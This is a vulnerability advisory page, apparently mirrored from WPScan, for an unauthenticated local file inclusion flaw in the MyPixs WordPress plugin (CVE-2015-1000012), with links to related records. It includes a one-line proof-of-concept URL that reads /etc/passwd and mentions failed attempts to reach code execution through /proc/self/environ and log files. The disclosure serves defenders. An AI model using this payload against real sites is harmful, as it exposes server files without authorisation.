Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpvulndbLarry W. CashdollarWPVDB-ID:24B83CE5-E3B8-4262-B087-A2DFEC014985
HistorySep 15, 2015 - 12:00 a.m.

MyPixs <= 0.3 - Unauthenticated Local File Inclusion (LFI)

2015-09-1500:00:00
Larry W. Cashdollar
wpscan.com
9

EPSS

0.007

Percentile

80.2%

JSON

Plugin is still affected and has been closed. Typical local file inclusion vulnerability: from downloadpage.php: I’ve tried to get RCE but didn’t have success reading from /proc/self/environ or /var/log/apache2/access.log include(): Failed opening ‘/proc/self/environ’ for inclusion (include_path=‘.:/usr/share/php:/usr/share/pear’) in /usr/share/wordpress/wp-content/plugins/mypixs/mypixs/downloadpage.php on line 4

PoC

http://www.example.com/wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd

Related

cvelist 1
nvd 1
nuclei 1
wpexploit 1
prion 1
cve 1
openvas 1
cvelist
cvelist
CVE-2015-1000012
2016-10-06 14:00:00
nvd
nvd
CVE-2015-1000012
2016-10-06 14:59:13
nuclei
nuclei
WordPress MyPixs <=0.3 - Local File Inclusion
2021-07-14 11:10:41
wpexploit
wpexploit
MyPixs <= 0.3 - Unauthenticated Local File Inclusion (LFI)
2015-09-15 00:00:00
prion
prion
Remote file inclusion
2016-10-06 14:59:00
cve
cve
CVE-2015-1000012
2016-10-06 14:59:13
openvas
openvas
WordPress Multiple Plugins / Themes Directory Traversal / File Download Vulnerability (HTTP)
2020-11-20 00:00:00

EPSS

0.007

Percentile

80.2%

JSON
Related for WPVDB-ID:24B83CE5-E3B8-4262-B087-A2DFEC014985
cvelist1nvd1nuclei1wpexploit1prion1cve1openvas1